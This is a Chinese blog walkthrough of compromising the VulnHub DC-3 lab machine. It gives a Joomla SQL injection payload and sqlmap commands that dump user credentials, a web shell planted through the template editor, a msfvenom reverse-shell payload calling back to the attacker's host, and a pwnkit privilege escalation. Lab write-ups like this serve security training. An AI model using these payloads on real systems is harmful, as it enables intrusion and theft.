vulnhub dc-3渗透

最新推荐文章于 2023-05-23 14:29:02 发布
最新推荐文章于 2023-05-23 14:29:02 发布
阅读量175 收藏 1
点赞数
分类专栏: 靶机及靶场通关 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129914770
版权

1.扫描存活主机,发现存货主机192.168.85.174

nmap 192.168.85.0/24

在这里插入图片描述
2.扫描端口,发现只开放了80端口

nmap -p1-65535 192.168.85.174

在这里插入图片描述
3.扫描服务版本信息

nma -sV 192.168.85.174

在这里插入图片描述
4.访问网站,发现cms为joomla
在这里插入图片描述
网站中有一段提示,是这个靶机只有一个flag,也就是在root目录下的flag
5.在网络上搜索joomla相关漏洞
msf尝试各种exp失败了
通过扫描(auxiliary/scanner/http/joomla_version) 知道了版本是3.7.0
找到两个相关漏洞 反序列化 rce(CVE-2015-8562 ) sql注入(CVE-2017-8917)
尝试反序列化 rce失败
sql注入
payload:

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,database()),1)

发现可以查出数据库
在这里插入图片描述
后面如果手工注入查字段会出现问题,因为有个表名’#__users’,使用单引号会出现报错,有转义符
使用sqlmap进行注入
查对应的表名

python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb --tables --batch

在这里插入图片描述
查#__users的字段

`python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users --columns`

在这里插入图片描述
查数据

python sqlmap.py -u "http://192.168.85.174/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomladb -T #__users -C username,password --dump

在这里插入图片描述
6.使用john破解密码
把密码写入1.txt

vim 1.txt
john 1.txt

破解出密码是spoony

7.扫描目录,登录后台

dirb http://192.168.85.174/

扫出关键目录administrator目录
在这里插入图片描述

8.找对应的改源码地方
在下方位置可以修改源码
在这里插入图片描述
在这里插入图片描述
写入一句话木马,保存
蚁剑连接,上传msf木马
发现执行失败,可能是权限的问题
使用msf生成php的木马

 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.85.129 lport=4444 -f raw  -o 1.php

把1.php的代码复制到网站源码中,保存,访问
监听

use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0.
run

成功收到会话
在这里插入图片描述
9.提权
上传漏洞探测脚本,发现cve-2021-4034
在这里插入图片描述
只要安装这个工具,就可能存在漏洞

 dpkg -l policykit-1    #查看是否安装了pwnkit

在这里插入图片描述
上传exp

make
./cve-2021-4034

成功提权
在这里插入图片描述
查看flag
在这里插入图片描述
参考文章:
joomla漏洞
dc-3渗透

mushangqiujin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub DC-1
weixin_45682839的博客
04-13 320
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub-DC-3靶场渗透练习
weixin_52451257的博客
11-17 2900
Vulnhub-DC-3 1105 DC-3 靶场地址: https://www.vulnhub.com/entry/dc-32,312/ 第一步:信息收集 nmap -sn 192.168.231.0/24 nmap -A -p- 192.168.231.141 dirb http://192.168.231.141 nikto -h http://192.168.231.141 去了日常四件套进行信息收集还可以通过joomscan工具对网站进行扫描 joomsc...
解决iis发布程序只有80端口可以被访问,其他端口访问不了的问题
HobbitX的博客
04-17 1610
解决iis除了80端口,其他端口发布之后访问不了的问题
vulnhub DC-3 靶机渗透测试
小松博客
05-21 159
我们使用账号admin,密码snoopy登陆到后台,再次回到msf中的利用脚本,输入run运行脚本。找到了不少漏洞可用,但就这个漏洞好使:CVE-2016-4557。得到一个漏洞利用脚本下载链接,我们把他down下来,然后解压。然后等待一下,输入ls查看目录内容,发现多了几个可执行文件。已经是root,直接cd到 /root目录,ls查看文件。拿到shell以后,我们上传漏洞检测脚本,寻找提权漏洞。等待几秒钟,然后输入whoami查看自己的权限。发现两个,可以尝试使用这个sql注入漏洞,
Vulnhub DC-3靶机渗透攻击过程演练
zhongxj183的博客
03-26 3177
Vulnhub DC-3靶机渗透攻击过程演练 DC-3介绍 DC-3靶机只有1个flag,一个入口点,根本没有任何线索。 环境准备 下载DC-3靶机导入VMware,选择和Kali同一网络适配器,DHCP获取IP即可 渗透过程 信息收集 首先扫描存活主机,得到目标靶机的IP nmap -sP 192.168.64.0/24 全端口扫描 nmap -T4 -sC -sV -p1-65535 192.168.64.157 仅开放了80端口,一个用 Joomla! 搭建的网站。Joomla! 是一套全球
Vulnhub DC-3靶机渗透测试(DC系列)
Alexhirchi的博客
10-11 909
每日学习~ 冲冲冲 VulnHub 入门DC系列之DC-1 说明 靶场下载地址:https://www.vulnhub.com/entry/dc-32,312/ 渗透靶场:VirtualBox 攻击靶机:本地机+kail(VMware) Flag:5个 启动DC-1靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机 ...
vulnhub DC-5 靶机 渗透测试
小松博客
05-23 220
我们把这个文件复制出来 /usr/share/exploitdb/exploits/linux/local/41154.sh。进入shell模式,输入命令find / -perm /4000 2>/dev/null,查找具有SUID权限的命令。发现这下面的时间是在变的,每次刷新都不一样,这里和footer.php的php是一样的,所以我们推测是文件包含漏洞。注意,请不要在kali里面编译,亲测编译后的程序在靶机运行会报错,我是在Centos中编译的。发现一个footer.php,发现每次访问都不一样。
Vulnhub靶场----3、DC-3.2
七天
03-14 538
1 、只开放80端口的情况下,网站指纹、目录扫描等方向 2 、通过网站CMS版本信息搜索相关版本漏洞 3 、利用版本SQL注入漏洞获取后台登录账号密码 4 、后台寻找webshell插入地址 5 、获取shell,寻找服务器版本漏洞 6 、利用服务器版本漏洞提权。
Vulnhub靶机DC-3渗透
xingjinhao123的博客
02-24 246
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/dc-32,312/ 靶机介绍,没有像DC-1和DC-2说是一共有几个flag 运行环境: 靶机:网络连接方式设为桥接,IP地址:192.168.1.73 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取IP地址 扫描端口,发现只有一个80端口,joomla框架 使用whatweb网络指纹工具扫描,看到框架确实是joomla 使用一个针对joomla的扫描工具
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8289
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2322140088-0b2a877d-bae9-4a8f-9267-bef87d63dd3a (1).zip
06-17
2322140088-0b2a877d-bae9-4a8f-9267-bef87d63dd3a (1).zip
简历精美模板酷黑炫彩.zip
06-17
在求职的征途上,一份出色的简历是你通往梦想职位的敲门砖。我们精心准备了一系列面试求职简历模板,旨在帮助你以最佳形象站在潜在雇主面前。这些简历模板不仅设计精美,而且注重内容的清晰呈现,使招聘经理一目了然地看到你的能力和经验。 我们的模板集合了多种风格与布局,无论你是应届毕业生、职场跳槽者还是行业专家,都能在这里找到适合你职业形象的简历设计。每一个模板都经过精心设计,确保你的简历在众多求职者中脱颖而出,同时保持足够的专业度和可读性。 不仅如此,我们的简历模板易于编辑,你可以根据具体职位需求快速调整内容,展现你的个人优势和职业成就。使用这些模板,将大大提高你的面试机会,并帮助你更好地表达自己的价值和潜力。 别让传统且缺乏创意的简历阻碍你迈向成功的道路。立即下载这些精美的简历模板,让你的求职之路更加顺畅,向心仪的工作迈进吧!记住,一个良好的开始是成功的一半,而一份精致的简历,正是你成功的起点。
protobuf-3.12.1-cp37-cp37m-win_amd64.whl
最新发布
06-17
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
渗透DC-1靶机设计思路
05-24
3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值